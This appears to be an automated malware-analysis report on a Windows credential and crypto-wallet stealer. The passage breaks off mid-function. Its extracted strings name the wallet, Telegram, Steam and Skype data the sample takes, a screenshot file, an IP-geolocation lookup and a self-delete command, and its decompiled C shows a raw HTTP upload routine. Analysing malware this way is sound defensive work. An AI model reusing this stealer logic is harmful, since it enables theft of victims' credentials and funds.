0x00418729
0x00418734
0x00418735
0x00418751
0x00418753
0x00418756
0x00418764
0x0041965c
0x0041965e
0x00419661
0x00419664
0x0041966f
0x0041967f
0x0041968a
0x0041969a
0x004196aa
0x004196b5
0x004196c5
0x004196d0
0x004196e0
0x004196eb
0x004196fb
0x00419706
0x00419716
0x00419721
0x00419731
0x0041973c
0x0041974c
0x00419757
0x00419767
0x00419772
0x00419782
0x00419792
0x0041979d
0x004197ad
0x004197b8
0x004197c8
0x004197d3
0x004197e3
0x004197ee
0x004197fe
0x0041980e
0x00419816
0x0041981e
0x00419829
0x00419836
0x0041983e
0x00419856
0x0041985d
0x0041985d
0x00418772
0x00418784
0x00418792
0x004187a0
0x004187ab
0x004187bc
0x004187cf
0x004187df
0x004187f0
0x00418800
0x0041880d
0x00418812
0x00000000
0x00000000
0x00418820
0x00418825
0x00000000
0x00000000
0x0041883f
0x0041884d
0x00418866
0x00418874
0x00418884
0x00418890
0x0041889d
0x004188a8
0x004188ae
0x004188b9
0x004188c1
0x004188c8
0x004188d7
0x004188da
0x00418fb5
0x00418fb5
0x00418fb5
0x00418fb8
0x00418fc3
0x00418fc8
0x00418fd9
0x00418fe9
0x00418ff4
0x00419005
0x0041900a
0x00419010
0x0041901b
0x0041902c
0x00419031
0x00419037
0x00419042
0x00419053
0x00419064
0x00419069
0x0041906f
0x0041907a
0x0041908b
0x0041909c
0x004190a1
0x004190a7
0x004190b2
0x004190c3
0x004190d4
0x004190d9
0x004190df
0x004190ea
0x004190fb
0x0041910c
0x00419111
0x00419117
0x00419122
0x00419129
0x0041913a
0x0041914b
0x00419150
0x00419156
0x00419161
0x00419168
0x00419179
0x0041918a
0x0041918f
0x00419195
0x004191a0
0x004191a7
0x004191b8
0x004191c9
0x004191ce
0x004191d4
0x004191df
0x004191e6
0x004191f7
0x00419208
0x0041920d
0x00419213
0x00419221
0x00419226
0x0041922c
0x00419237
0x00419248
0x0041924d
0x0041925b
0x00419260
0x00419265
0x0041926a
0x0041926c
0x00419271
0x00419274
0x00419279
0x0041927e
0x00419280
0x00419285
0x0041928a
0x0041928f
0x00419294
0x00419296
0x004192a1
0x004192a6
0x004192ac
0x004192b1
0x004192b6
0x004192b8
0x004192bd
0x004192c2
0x004192c7
0x004192cc
0x004192ce
0x004192d9
0x004192de
0x004192e4
0x004192e9
0x004192ee
0x004192f0
0x004192f5
0x004192fa
0x004192ff
0x00419304
0x00419306
0x00419311
0x00419316
0x0041931c
0x00419321
0x00419326
0x00419328
0x0041932d
0x0041933a
0x0041933f
0x00419343
0x00419345
0x00419348
0x0041934d
0x00419352
0x00419354
0x00419359
0x0041935c
0x00419361
0x00419364
0x00419369
0x0041936e
0x00419370
0x00419375
0x00419382
0x00419382
0x00419392
0x0041939e
0x004193a6
0x004193af
0x004193b6
0x004193bd
0x004193c5
0x004193ca
0x004193cd
0x004194dd
0x004194dd
0x004194e8
0x004194f8
0x004194fd
0x00419518
0x00419520
0x00419525
0x0041952b
0x0041952f
0x00419542
0x00419547
0x00419551
0x0041955d
0x00419565
0x00419576
0x00419586
0x00419597
0x004195aa
0x004195bb
0x004195cc
0x004195e7
0x004195f7
0x00419605
0x00419616
0x00419627
0x00419637
0x0041963d
0x0041963f
0x0041964c
0x00419653
0x00419657
0x00419657
0x0041952f
0x00000000
0x00419525
0x00419507
0x0041950c
0x00000000
0x00000000
0x0041950e
0x00000000
0x004193d3
0x004193d3
0x004193de
0x004193ed
0x004193f0
0x00000000
0x00000000
0x004193f6
0x004193f7
0x004193f9
0x004193f9
0x00419409
0x0041940e
0x00419411
0x0041941f
0x0041942c
0x0041942f
0x00000000
0x00000000
0x0041943f
0x00419444
0x00000000
0x00000000
0x0041944a
0x00419458
0x0041945d
0x0041946b
0x0041946e
0x004194b1
0x004194b1
0x004194b5
0x004194c2
0x004194d0
0x004194d0
0x00000000
0x004194b5
0x00419470
0x00419471
0x00419478
0x00419487
0x00419492
0x004194a1
0x004194a9
0x00000000
0x00000000
0x004194ab
0x004194ae
0x004194af
0x00000000
0x00000000
0x00000000
0x004194af
0x00000000
0x004194d5
0x004194d5
0x004194d6
0x004194d6
0x004194d6
0x00000000
0x004193f9
0x004188e0
0x004188e0
0x004188e1
0x004188e3
0x004188f1
0x00000000
0x00000000
0x004188f9
0x00418964
0x00418966
0x00418966
0x00418975
0x00418980
0x004189a1
0x004189a6
0x004189ac
0x004189ca
0x004189cf
0x004189d5
0x004189f3
0x004189f8
0x004189fe
0x00418a23
0x00418a25
0x00418a2a
0x00418a2a
0x00418a4f
0x00418a51
0x00418a56
0x00418a56
0x00418a65
0x00418a6a
0x00418a7b
0x00418a7d
0x00418a82
0x00418a82
0x00418a84
0x00418a89
0x00418a8c
0x00418a93
0x00418a93
0x00418a8c
0x00418aa2
0x00418aa9
0x00418aa9
0x00418ab8
0x00418ac7
0x00418acc
0x00418ad6
0x00418ad6
0x00418ae5
0x00418aec
0x00418aec
0x00418afb
0x00418afd
0x00418aff
0x00418b01
0x00418b09
0x00418b11
0x00418b14
0x00418b19
0x00418b1b
0x00418b1c
0x00418b21
0x00418b29
0x00418b29
0x00418b38
0x00418b3a
0x00418b3a
0x00418b38
0x00418b3e
0x00418b44
0x00418b47
0x00418ed1
0x00418eda
0x00418edc
0x00418ee2
0x00418ee5
0x00418eed
0x00418ef2
0x00418ef2
0x00418efd
0x00418f00
0x00418f06
0x00418f14
0x00418f24
0x00418f29
0x00418fa3
0x00418fa8
0x00418f2b
0x00418f2b
0x00418f3f
0x00418f55
0x00418f5e
0x00418f6b
0x00418f70
0x00418f73
0x00418f78
0x00418f86
0x00418f91
0x00418f96
0x00418f96
0x00418f29
0x00418b4d
0x00418b5b
0x00418b69
0x00418b7c
0x00418dfa
0x00418e05
0x00418e12
0x00418e22
0x00418e36
0x00418e42
0x00418e47
0x00418e47
0x00418e4a
0x00418e4b
0x00418e4d
0x00418e55
0x00418e58
0x00418e68
0x00418e79
0x00418e84
0x00418e91
0x00418e9c
0x00418eae
0x00418ebf
0x00418eca
0x00418ecb
0x00418ecc
0x00000000
0x00418ecc
0x00418b86
0x00418b8b
0x00418b93
0x00418b9e
0x00418b9f
0x00418ba4
0x00418baf
0x00000000
0x00000000
0x00418bb5
0x00418de0
0x00418bc1
0x00418bd0
0x00418be1
0x00418bec
0x00418bef
0x00418bf4
0x00418bf6
0x00418c02
0x00418c0b
0x00418c16
0x00418c17
0x00418c1c
0x00418c2f
0x00418c40
0x00418c4b
0x00418c55
0x00418c60
0x00418c61
0x00418c62
0x00418c70
0x00418c78
0x00418c80
0x00418c83
0x00418c88
0x00418c93
0x00418ca8
0x00418cba
0x00418cca
0x00418cd8
0x00418ce6
0x00418cf7
0x00418d05
0x00418d16
0x00418d21
0x00418d2e
0x00418d3e
0x00418d52
0x00418d5e
0x00418d63
0x00418d63
0x00418d66
0x00418d67
0x00418d77
0x00418d88
0x00418d93
0x00418da0
0x00418dab
0x00418dba
0x00418dcb
0x00418dd6
0x00418dd7
0x00418dd8
0x00418dd8
0x00418ddd
0x00418ddd
0x00418ddd
0x00000000
0x00418de9
0x00418fad
0x00418fad
0x00418fae
0x00418fae
0x00418fae
0x00000000
0x004188e3

APIs

CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 00418751

Part of subcall function 00409668: CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00409963,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188C6,?,?), ref: 004096BF
Part of subcall function 00409668: CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00409963,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188C6), ref: 0040970D
Part of subcall function 00409668: LoadLibraryExW.KERNEL32(00000000,00000000,00000008,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188C6,?,?,?), ref: 00409762
Part of subcall function 00409668: GetProcAddress.KERNEL32(00000000,00000000), ref: 00409782
Part of subcall function 00409668: GetProcAddress.KERNEL32(00000000,00000000), ref: 0040979C

GetSystemMetrics.USER32 ref: 00418B0C
GetSystemMetrics.USER32 ref: 00418B14
ExitProcess.KERNEL32(00000000), ref: 00419657

Strings

</c>, xrefs: 00418832
<n>, xrefs: 00418861
Coins\MultiBitHD, xrefs: 00418A65
%APPDATA%\Jaxx\Local Storage\, xrefs: 00418A43
++++, xrefs: 00418FB5
Files\, xrefs: 00418D72, 00418E4D
</ip, xrefs: 00419364
%APPDATA%\Ethereum\keystore\, xrefs: 004189EE
</n>, xrefs: 00418859
Coins\Jaxx\Local Storage\, xrefs: 00418A39
%APPDATA%\MultiBitHD\, xrefs: 00418A6F
Coins, xrefs: 0041897B
<file, xrefs: 004192FA
Coins\Exodus, xrefs: 00418A0D
mbhd.wallet.aes,mbhd.checkpoints,mbhd.spvchain,mbhd.yaml, xrefs: 00418A6A
<coks, xrefs: 004192C2
Coins\Ethereum, xrefs: 004189E4
%DSK_, xrefs: 00418B71, 00418B8E, 00418C17
D877F783D5*,map*, xrefs: 00418ACC
scr.jpg, xrefs: 00418B21
*.json,*.seco, xrefs: 00418A12
Coins\Electrum-LTC, xrefs: 004189BB
ip.txt, xrefs: 00418F91, 00418FA3
</file, xrefs: 0041931C
<c>, xrefs: 0041883A
Telegram, xrefs: 00418AC7
</pwds, xrefs: 004192AC
<d>, xrefs: 00418898
<info, xrefs: 00419260
%appdata%\Electrum\wallets\, xrefs: 0041899C
</d>, xrefs: 00418890
<pwds, xrefs: 0041928A
</info, xrefs: 00419274
exit, xrefs: 0041881B
<, xrefs: 00419547
System.txt, xrefs: 00418FE4
UTC*, xrefs: 004189E9
Steam, xrefs: 00418AE7
%comspec%, xrefs: 00419571
image/jpeg, xrefs: 00418B01
</coks, xrefs: 004192E4
"query":", xrefs: 00418F50
%appdata%\Electrum-LTC\wallets\, xrefs: 004189C5
Skype, xrefs: 00418AA4
GET, xrefs: 00418F33
%appdata%\Telegram Desktop\tdata\, xrefs: 00418AD1
<ip, xrefs: 00419348
%APPDATA%\Exodus\, xrefs: 00418A17
Coins\Electrum, xrefs: 00418992
T_@, xrefs: 00419403, 0041981E
/c %WINDIR%\system32\timeout.exe 3 & del ", xrefs: 00419592
http://ip-api.com/json, xrefs: 00418F3A
PasswordsList.txt, xrefs: 00418921
"countryCode":", xrefs: 00418F66

Memory Dump Source

Source File: 00000008.00000002.318255606.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Create$AddressDirectoryMetricsProcSystem$ExitLibraryLoadMutexProcess
String ID: "countryCode":"$"query":"$%APPDATA%\Ethereum\keystore\$%APPDATA%\Exodus\$%APPDATA%\Jaxx\Local Storage\$%APPDATA%\MultiBitHD\$%DSK_$%appdata%\Electrum-LTC\wallets\$%appdata%\Electrum\wallets\$%appdata%\Telegram Desktop\tdata\$%comspec%$*.json,*.seco$++++$/c %WINDIR%\system32\timeout.exe 3 & del "$<$</c>$</coks$</d>$</file$</info$</ip$</n>$</pwds$<c>$<coks$<d>$<file$<info$<ip$<n>$<pwds$Coins$Coins\Electrum$Coins\Electrum-LTC$Coins\Ethereum$Coins\Exodus$Coins\Jaxx\Local Storage\$Coins\MultiBitHD$D877F783D5*,map*$Files\$GET$PasswordsList.txt$Skype$Steam$System.txt$T_@$Telegram$UTC*$exit$http://ip-api.com/json$image/jpeg$ip.txt$mbhd.wallet.aes,mbhd.checkpoints,mbhd.spvchain,mbhd.yaml$scr.jpg
API String ID: 2865495769-3281574059
Opcode ID: 0ab0c4a4a8e2312ad0975d62049ca3f383255c93c7323e42e5c8637e5f969f60
Instruction ID: 12fbeab09d86b4d4d3426c2dede24d6d64c59345960e79b613594a42cd3754e1
Opcode Fuzzy Hash: 0ab0c4a4a8e2312ad0975d62049ca3f383255c93c7323e42e5c8637e5f969f60
Instruction Fuzzy Hash: 91A21A34A002199BDB10EB55DC91BDEB7B5EF49304F5080BBF408BB291DB78AE858F59

Uniqueness

Uniqueness Score: -1.00%

Function 00417216, Relevance: 57.8, APIs: 20, Strings: 13, Instructions: 64
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00417216() {
				void* _t1;
				struct HINSTANCE__* _t2;
				struct HINSTANCE__* _t4;
				_Unknown_base(*)()* _t21;

				 *0x41cb2c =  *0x41cb2c - 1;
				if( *0x41cb2c < 0) {
					_t2 = LoadLibraryA("crtdll.dll"); // executed
					 *0x41cb04 = GetProcAddress(_t2, "wcscmp");
					_t4 = LoadLibraryA("Gdiplus.dll"); // executed
					 *0x41cb08 = GetProcAddress(_t4, "GdiplusStartup");
					 *0x41cb0c = GetProcAddress(LoadLibraryA("Gdiplus.dll"), "GdiplusShutdown");
					 *0x41cb10 = GetProcAddress(LoadLibraryA("Gdiplus.dll"), "GdipCreateBitmapFromHBITMAP");
					 *0x41cb14 = GetProcAddress(LoadLibraryA("Gdiplus.dll"), "GdipGetImageEncodersSize");
					 *0x41cb18 = GetProcAddress(LoadLibraryA("Gdiplus.dll"), "GdipGetImageEncoders");
					 *0x41cb1c = GetProcAddress(LoadLibraryA("Gdiplus.dll"), "GdipDisposeImage");
					 *0x41cb20 = GetProcAddress(LoadLibraryA("Gdiplus.dll"), "GdipSaveImageToStream");
					 *0x41cb24 = GetProcAddress(LoadLibraryA("ole32.dll"), "CreateStreamOnHGlobal");
					_t21 = GetProcAddress(LoadLibraryA("ole32.dll"), "GetHGlobalFromStream");
					 *0x41cb28 = _t21;
					return _t21;
				}
				return _t1;
			}

0x00417218
0x0041721f
0x0041722f
0x0041723a
0x00417249
0x00417254
0x0041726e
0x00417288
0x004172a2
0x004172bc
0x004172d6
0x004172f0
0x0041730a
0x0041731f
0x00417324
0x00000000
0x00417324
0x00417329

APIs

LoadLibraryA.KERNEL32(crtdll.dll,wcscmp), ref: 0041722F
GetProcAddress.KERNEL32(00000000,crtdll.dll), ref: 00417235
LoadLibraryA.KERNEL32(Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 00417249
GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 0041724F
LoadLibraryA.KERNEL32(Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 00417263
GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417269
LoadLibraryA.KERNEL32(Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 0041727D
GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417283
LoadLibraryA.KERNEL32(Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 00417297
GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 0041729D
LoadLibraryA.KERNEL32(Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll), ref: 004172B1
GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 004172B7
LoadLibraryA.KERNEL32(Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll), ref: 004172CB
GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 004172D1
LoadLibraryA.KERNEL32(Gdiplus.dll,GdipSaveImageToStream,00000000,Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll), ref: 004172E5
GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 004172EB
LoadLibraryA.KERNEL32(ole32.dll,CreateStreamOnHGlobal,00000000,Gdiplus.dll,GdipSaveImageToStream,00000000,Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll), ref: 004172FF
GetProcAddress.KERNEL32(00000000,ole32.dll), ref: 00417305
LoadLibraryA.KERNEL32(ole32.dll,GetHGlobalFromStream,00000000,ole32.dll,CreateStreamOnHGlobal,00000000,Gdiplus.dll,GdipSaveImageToStream,00000000,Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll), ref: 00417319
GetProcAddress.KERNEL32(00000000,ole32.dll), ref: 0041731F

Strings

wcscmp, xrefs: 00417225
Gdiplus.dll, xrefs: 00417244, 0041725E, 00417278, 00417292, 004172AC, 004172C6, 004172E0
GdipGetImageEncodersSize, xrefs: 0041728D
GdiplusShutdown, xrefs: 00417259
GetHGlobalFromStream, xrefs: 0041730F
GdiplusStartup, xrefs: 0041723F
crtdll.dll, xrefs: 0041722A
GdipCreateBitmapFromHBITMAP, xrefs: 00417273
GdipSaveImageToStream, xrefs: 004172DB
ole32.dll, xrefs: 004172FA, 00417314
GdipDisposeImage, xrefs: 004172C1
CreateStreamOnHGlobal, xrefs: 004172F5
GdipGetImageEncoders, xrefs: 004172A7

Memory Dump Source

Source File: 00000008.00000002.318255606.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: CreateStreamOnHGlobal$GdipCreateBitmapFromHBITMAP$GdipDisposeImage$GdipGetImageEncoders$GdipGetImageEncodersSize$GdipSaveImageToStream$Gdiplus.dll$GdiplusShutdown$GdiplusStartup$GetHGlobalFromStream$crtdll.dll$ole32.dll$wcscmp
API String ID: 2574300362-2815069134
Opcode ID: 3bc6c4118995df7160033985ba2e072cd86b9b17629d2e708302bb0f3277f80d
Instruction ID: 88d1ed536910c73cd15d425763909c73792c0e606fd49294d8ff60234fce0fcb
Opcode Fuzzy Hash: 3bc6c4118995df7160033985ba2e072cd86b9b17629d2e708302bb0f3277f80d
Instruction Fuzzy Hash: BD11EDF16D8304B5C60077F2FD47ADA26657645709361453BBE10B20E2D57C6881A69D

Uniqueness

Uniqueness Score: -1.00%

Function 00417820, Relevance: 45.8, APIs: 17, Strings: 9, Instructions: 269
libraryloadernetworkCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E00417820(intOrPtr __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __esi, intOrPtr _a4, intOrPtr _a8, char _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v432;
				intOrPtr _v444;
				short _v446;
				char _v448;
				char _v1472;
				char _v1476;
				char _v1480;
				char _v1484;
				char _v1488;
				char _v1492;
				void* _t141;
				void* _t144;
				void* _t151;
				void* _t175;
				void* _t186;
				struct HINSTANCE__* _t193;
				struct HINSTANCE__* _t196;
				void* _t197;
				intOrPtr _t206;
				void* _t222;
				void* _t225;
				void* _t228;

				_v1476 = 0;
				_v1480 = 0;
				_v1484 = 0;
				_v1488 = 0;
				_v1492 = 0;
				_v20 = 0;
				_v24 = 0;
				_v28 = 0;
				_v32 = 0;
				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				E00403980(_v8);
				E00403980(_v12);
				E00403980(_v16);
				E00403980(_a16);
				E00403980(_a12);
				_push(_t228);
				_push(0x417c31);
				_push( *[fs:eax]);
				 *[fs:eax] = _t228 + 0xfffffa30;
				E0040357C( &_v28, "wsock32.dll");
				_t196 = GetModuleHandleA(E004039E8( &_v28));
				if(_t196 == 0) {
					_t193 = LoadLibraryA(E004039E8( &_v28)); // executed
					_t196 = _t193;
				}
				 *0x41cb38 = GetProcAddress(_t196,  &((E004039E8( &_v28))[0xc]));
				 *0x41cb3c = GetProcAddress(_t196,  &((E004039E8( &_v28))[0x17]));
				 *0x41cb40 = GetProcAddress(_t196,  &((E004039E8( &_v28))[0x25]));
				 *0x41cb44 = GetProcAddress(_t196,  &((E004039E8( &_v28))[0x2c]));
				 *0x41cb48 = GetProcAddress(_t196,  &((E004039E8( &_v28))[0x31]));
				 *0x41cb4c = GetProcAddress(_t196,  &((E004039E8( &_v28))[0x36]));
				 *0x41cb50 = GetProcAddress(_t196,  &((E004039E8( &_v28))[0x3c]));
				 *0x41cb54 = GetProcAddress(_t196,  &((E004039E8( &_v28))[0x44]));
				if(_t196 != 0 &&  *0x41cb38 != 0 &&  *0x41cb3c != 0 &&  *0x41cb40 != 0 &&  *0x41cb44 != 0 &&  *0x41cb48 != 0 &&  *0x41cb4c != 0 &&  *0x41cb50 != 0 &&  *0x41cb54 != 0) {
					E004034E4( &_v24);
					_push( &_v432);
					_push(E00404F40(2, 2));
					if( *0x41cb38() == 0) {
						_t141 =  *0x41cb40(2, 1, 0); // executed
						_t225 = _t141;
						if(_t225 != 0xffffffff) {
							_v448 = 2;
							_t144 =  *0x41cb3c(E00403990(_v8)); // executed
							if(_t144 != 0) {
								_v444 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t144 + 0xc))))));
								_v446 =  *0x41cb4c(_a8);
								_t151 =  *0x41cb50(_t225,  &_v448, 0x10); // executed
								_t243 = _t151;
								if(_t151 == 0) {
									E00403850();
									E00403D88( &_v1480, _v1484);
									E0041745C(E00403790(_a12), _t196,  &_v1488, _t225, _t243);
									E00403D88( &_v1492, _a12);
									E00403E78();
									E0040377C( &_v20, _v1476);
									 *0x41cb44(_t225, E004039E8( &_v20), E00403790(_v20), 0, _v1492, L"\r\n\r\n", _v1488, _v1480, "Content-Length: ", 0x417cd4, "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)", "User-agent: ", "Connection: close\r\n", 0x417cd4, _a16, "Host: ", " HTTP/1.0\r\n", _v12, 0x417ca4, _v16); // executed
									E004034E4( &_v24);
									do {
										E004034E4( &_v32);
										E004028E0( &_v1472, 0x400);
										_t175 =  *0x41cb48(_t225,  &_v1472, 0x400, 0); // executed
										_t197 = _t175;
										E004035D4( &_v32, _t197,  &_v1472);
										E00403798( &_v24, _v32);
									} while (_t197 > 0);
									 *0x41cb54(_t225);
									_push( &_v24);
									_push(E00403AD4(0x417d7c, _v24) + 4);
									_t186 = E00403790(_v24);
									_pop(_t222);
									E004039F0(_v24, _t186, _t222);
									E00403538(_a4, _v24);
								}
							}
						}
					}
				}
				_pop(_t206);
				 *[fs:eax] = _t206;
				_push(E00417C38);
				E00403BF4( &_v1492, 2);
				E004034E4( &_v1484);
				E00403BF4( &_v1480, 2);
				E00403508( &_v32, 7);
				return E00403508( &_a12, 2);
			}

0x0041782d
0x00417833
0x00417839
0x0041783f
0x00417845
0x0041784b
0x0041784e
0x00417851
0x00417854
0x00417857
0x0041785a
0x0041785d
0x00417863
0x0041786b
0x00417873
0x0041787b
0x00417883
0x0041788a
0x0041788b
0x00417890
0x00417893
0x0041789e
0x004178b1
0x004178b5
0x004178c0
0x004178c5
0x004178c5
0x004178d9
0x004178f0
0x00417907
0x0041791e
0x00417935
0x0041794c
0x00417963
0x0041797a
0x00417981
0x004179f2
0x004179fd
0x00417a07
0x00417a10
0x00417a1c
0x00417a22
0x00417a27
0x00417a2d
0x00417a3f
0x00417a47
0x00417a54
0x00417a65
0x00417a76
0x00417a7c
0x00417a7e
0x00417ac5
0x00417ad6
0x00417aef
0x00417b08
0x00417b1e
0x00417b2c
0x00417b46
0x00417b4f
0x00417b54
0x00417b57
0x00417b69
0x00417b7d
0x00417b83
0x00417b90
0x00417b9b
0x00417ba0
0x00417ba5
0x00417bae
0x00417bbf
0x00417bc3
0x00417bcd
0x00417bce
0x00417bd9
0x00417bd9
0x00417a7e
0x00417a47
0x00417a27
0x00417a10
0x00417be0
0x00417be3
0x00417be6
0x00417bf6
0x00417c01
0x00417c11
0x00417c1e
0x00417c30

APIs

GetModuleHandleA.KERNEL32(00000000,00000000,00417C31,?,00000000,00000000,?,00418203,00000000,?,?,?), ref: 004178AC
LoadLibraryA.KERNEL32(00000000,00000000,00000000,00417C31,?,00000000,00000000,?,00418203,00000000,?,?,?), ref: 004178C0
GetProcAddress.KERNEL32(00000000,-0000000C), ref: 004178D4
GetProcAddress.KERNEL32(00000000,-00000017), ref: 004178EB
GetProcAddress.KERNEL32(00000000,-00000025), ref: 00417902
GetProcAddress.KERNEL32(00000000,-0000002C), ref: 00417919
GetProcAddress.KERNEL32(00000000,-00000031), ref: 00417930
GetProcAddress.KERNEL32(00000000,-00000036), ref: 00417947
GetProcAddress.KERNEL32(00000000,-0000003C), ref: 0041795E
GetProcAddress.KERNEL32(00000000,-00000044), ref: 00417975
WSAStartup.WS2_32(00000000,?), ref: 00417A08
socket.WS2_32(00000002,00000001,00000000), ref: 00417A1C
gethostbyname.WS2_32(00000000), ref: 00417A3F
htons.WS2_32(00000000), ref: 00417A5F
connect.WS2_32(00000000,00000002,00000010), ref: 00417A76
send.WS2_32(00000000,00000000,00000000,00000000), ref: 00417B46
closesocket.WS2_32(00000000), ref: 00417BA5

Strings

wsock32.dll, xrefs: 00417899
Content-Length: , xrefs: 00417AB5
, xrefs: 00417AFA
Connection: close, xrefs: 00417AA1
HTTP/1.0, xrefs: 00417A8F
Host: , xrefs: 00417A94
Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1), xrefs: 00417AAB
, xrefs: 00417BB2
User-agent: , xrefs: 00417AA6

Memory Dump Source

Source File: 00000008.00000002.318255606.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$HandleLibraryLoadModuleStartupclosesocketconnectgethostbynamehtonssendsocket
String ID: $$ HTTP/1.0$Connection: close$Content-Length: $Host: $Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)$User-agent: $wsock32.dll
API String ID: 4159890453-3355491746
Opcode ID: b831acf75b33ce788b8c120819d800a9bb333e76fc7a647fd8acf93ac5003d10
Instruction ID: 40f87eb91c0466ae62d4265024b0cddbd223269e9b4c2b0dfc8b3cbba4f3f7f6
Opcode Fuzzy Hash: b831acf75b33ce788b8c120819d800a9bb333e76fc7a647fd8acf93ac5003d10
Instruction Fuzzy Hash: 22B101B19042099BDB10EF65DC86ADFBBB8BB04309F10407BE505F22D1DB78AA458F98

Uniqueness

Uniqueness Score: -1.00%

Function 00417D84, Relevance: 40.6, APIs: 17, Strings: 6, Instructions: 377
libraryloadernetworkCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00417D84(intOrPtr __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				_Unknown_base(*)()* _v20;
				_Unknown_base(*)()* _v24;
				_Unknown_base(*)()* _v28;
				_Unknown_base(*)()* _v32;
				_Unknown_base(*)()* _v36;
				_Unknown_base(*)()* _v40;
				_Unknown_base(*)()* _v44;
				_Unknown_base(*)()* _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _v64;
				void* _v68;
				intOrPtr _v72;
				char _v73;
				signed int _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v132;
				char _v388;
				char _v516;
				char _v644;
				char _v2692;
				char _v3716;
				char _v3776;
				char _v69412;
				char _v69416;
				char _v69420;
				char _v69424;
				char _v69428;
				char _v69432;
				char _v69436;
				char _v69440;
				void* __ecx;
				long _t224;
				long _t293;
				void* _t307;
				struct HINSTANCE__* _t325;
				struct HINSTANCE__* _t329;
				void* _t330;
				intOrPtr _t332;
				intOrPtr _t356;
				void* _t365;
				struct _SYSTEMTIME _t376;
				intOrPtr* _t378;
				intOrPtr _t380;
				intOrPtr _t381;
				char _t396;

				_t380 = _t381;
				_t332 = 0x21e7;
				do {
					_push(0);
					_push(0);
					_t332 = _t332 - 1;
				} while (_t332 != 0);
				_t1 =  &_v8;
				 *_t1 = _t332;
				_v16 =  *_t1;
				_v12 = __edx;
				_v8 = __eax;
				E00403980(_v8);
				E00403980(_v12);
				E00403980(_v16);
				_t376 =  &_v3776;
				_push(_t380);
				_push(0x418292);
				_push( *[fs:eax]);
				 *[fs:eax] = _t381;
				if(_v16 == 0) {
					E0040357C( &_v16, 0x4182ac);
				}
				E004034E4( &_v92);
				E0040357C( &_v56, _v8);
				_v73 = 0;
				E0040357C( &_v52, "wininet.dll");
				_t329 = GetModuleHandleA(E004039E8( &_v52));
				if(_t329 == 0) {
					_t325 = LoadLibraryA(E004039E8( &_v52)); // executed
					_t329 = _t325;
				}
				_v20 = GetProcAddress(_t329,  &((E004039E8( &_v52))[0xc]));
				_v24 = GetProcAddress(_t329,  &((E004039E8( &_v52))[0x1a]));
				_v28 = GetProcAddress(_t329,  &((E004039E8( &_v52))[0x2b]));
				_v32 = GetProcAddress(_t329,  &((E004039E8( &_v52))[0x3c]));
				_v36 = GetProcAddress(_t329,  &((E004039E8( &_v52))[0x53]));
				_v40 = GetProcAddress(_t329,  &((E004039E8( &_v52))[0x64]));
				_t378 = GetProcAddress(_t329,  &((E004039E8( &_v52))[0x75]));
				_v44 = GetProcAddress(_t329,  &((E004039E8( &_v52))[0x89]));
				_v48 = GetProcAddress(_t329,  &((E004039E8( &_v52))[0x9b]));
				E00404F5C();
				E00404F5C();
				E00404F5C();
				E00404F5C();
				E00404F5C();
